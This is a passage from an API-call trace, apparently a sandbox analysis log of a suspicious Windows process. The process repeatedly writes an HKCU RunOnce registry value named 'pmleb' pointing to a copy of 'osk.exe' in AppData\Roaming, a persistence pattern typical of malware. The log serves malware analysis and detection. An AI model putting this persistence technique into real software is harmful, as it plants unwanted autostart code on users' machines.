_MaxCount=0x5) returned 0 [0081.783] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.784] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.784] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.784] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.784] RegCloseKey (hKey=0x280) returned 0x0 [0081.784] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.784] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.784] SetTimer (hWnd=0x20280, nIDEvent=0x20c7, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c7 [0081.784] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.796] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.796] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.796] KillTimer (hWnd=0x20280, uIDEvent=0x20c7) returned 1 [0081.797] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.797] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.797] IUnknown:Release (This=0x787518) returned 0x1 [0081.797] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.797] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.797] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.797] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.797] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.797] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0081.798] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.798] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4d [0081.798] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.798] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4c [0081.798] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.799] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.799] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.799] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.799] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.799] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.799] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.799] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.799] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.799] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.799] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.799] RegCloseKey (hKey=0x280) returned 0x0 [0081.799] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.800] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.800] SetTimer (hWnd=0x20280, nIDEvent=0x20c8, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c8 [0081.800] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.812] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.812] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.812] KillTimer (hWnd=0x20280, uIDEvent=0x20c8) returned 1 [0081.813] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.813] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.813] IUnknown:Release (This=0x787518) returned 0x1 [0081.813] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.813] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.813] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.813] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.813] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.814] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0081.814] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.814] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4e [0081.814] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.815] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4d [0081.815] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.815] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.815] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.815] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.815] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.815] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0081.815] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0081.815] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0081.815] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0081.815] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0081.815] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0081.816] RegCloseKey (hKey=0x280) returned 0x0 [0081.816] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.816] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.816] SetTimer (hWnd=0x20280, nIDEvent=0x20c9, uElapse=0xa, lpTimerFunc=0x0) returned 0x20c9 [0081.816] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0081.827] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0081.827] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0081.828] KillTimer (hWnd=0x20280, uIDEvent=0x20c9) returned 1 [0081.828] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0081.828] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0081.828] IUnknown:Release (This=0x787518) returned 0x1 [0081.828] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0081.828] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0081.828] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0081.828] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0081.828] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0081.829] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0081.829] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0081.829] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0081.829] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x4f [0081.829] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0081.830] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x4e [0081.830] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.830] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0081.830] IUnknown:Release (This=0x7a9740) returned 0x1 [0081.830] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0081.830] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0081.830] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0081.830] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0081.830] 